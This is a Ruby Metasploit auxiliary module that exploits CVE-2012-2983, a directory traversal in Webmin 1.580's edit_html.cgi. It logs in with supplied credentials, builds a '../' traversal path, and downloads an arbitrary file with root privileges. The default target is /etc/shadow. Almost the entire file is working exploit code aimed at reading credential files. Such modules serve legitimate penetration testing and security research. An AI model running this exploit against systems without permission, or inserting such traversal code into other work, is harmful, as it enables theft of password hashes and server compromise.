1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8
  include Msf::Auxiliary::Report
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access',
15
        'Description' => %q{
16
          This module exploits a directory traversal in Webmin 1.580. The vulnerability
17
          exists in the edit_html.cgi component and allows an authenticated user with access
18
          to the File Manager Module to access arbitrary files with root privileges. The
19
          module has been tested successfully with Webmin 1.580 over Ubuntu 10.04.
20
        },
21
        'Author' => [
22
          'Unknown', # From American Information Security Group
23
          'juan vazquez' # Metasploit module
24
        ],
25
        'License' => MSF_LICENSE,
26
        'References' => [
27
          ['OSVDB', '85247'],
28
          ['BID', '55446'],
29
          ['CVE', '2012-2983'],
30
          ['URL', 'http://www.americaninfosec.com/research/dossiers/AISG-12-002.pdf'],
31
          ['URL', 'https://github.com/webmin/webmin/commit/4cd7bad70e23e4e19be8ccf7b9f245445b2b3b80']
32
        ],
33
        'DisclosureDate' => '2012-09-06',
34
        'Actions' => [
35
          ['Download', { 'Description' => 'Download arbitrary file' }]
36
        ],
37
        'DefaultAction' => 'Download',
38
        'Notes' => {
39
          'Stability' => [CRASH_SAFE],
40
          'SideEffects' => [IOC_IN_LOGS],
41
          'Reliability' => []
42
        }
43
      )
44
    )
45

46
    register_options(
47
      [
48
        Opt::RPORT(10000),
49
        OptBool.new('SSL', [true, 'Use SSL', true]),
50
        OptString.new('USERNAME', [true, 'Webmin Username']),
51
        OptString.new('PASSWORD', [true, 'Webmin Password']),
52
        OptInt.new('DEPTH', [true, 'Traversal depth', 4]),
53
        OptString.new('RPATH', [ true, 'The file to download', '/etc/shadow' ])
54
      ]
55
    )
56
  end
57

58
  def run
59
    print_status('Attempting to login...')
60

61
    data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"
62

63
    res = send_request_cgi(
64
      {
65
        'method' => 'POST',
66
        'uri' => '/session_login.cgi',
67
        'cookie' => 'testing=1',
68
        'data' => data
69
      }, 25
70
    )
71

72
    if res && (res.code == 302) && res.get_cookies =~ /sid/
73
      session = res.get_cookies.scan(/sid=(\w+);*/).flatten[0] || ''
74
      if session && !session.empty?
75
        print_good 'Authentication successful'
76
      else
77
        print_error 'Authentication failed'
78
        return
79
      end
80
    else
81
      print_error 'Authentication failed'
82
      return
83
    end
84

85
    print_status("Attempting to retrieve #{datastore['RPATH']}...")
86

87
    traversal = '../' * datastore['DEPTH']
88
    traversal << datastore['RPATH']
89
    data = "file=#{traversal}&text=1"
90

91
    res = send_request_cgi(
92
      {
93
        'method' => 'GET',
94
        'uri' => "/file/edit_html.cgi?#{data}",
95
        'cookie' => "sid=#{session}"
96
      }, 25
97
    )
98

99
    if res && (res.code == 200) && res.body =~ /#{traversal}/ && res.body =~ %r{name=body>(.*)</textarea>}m
100
      loot = ::Regexp.last_match(1)
101
      f = ::File.basename(datastore['RPATH'])
102
      path = store_loot('webmin.file', 'application/octet-stream', rhost, loot, f, datastore['RPATH'])
103
      print_good("#{datastore['RPATH']} saved in #{path}")
104
    else
105
      print_error('Failed to retrieve the file')
106
      return
107
    end
108
  end
109
end
110

111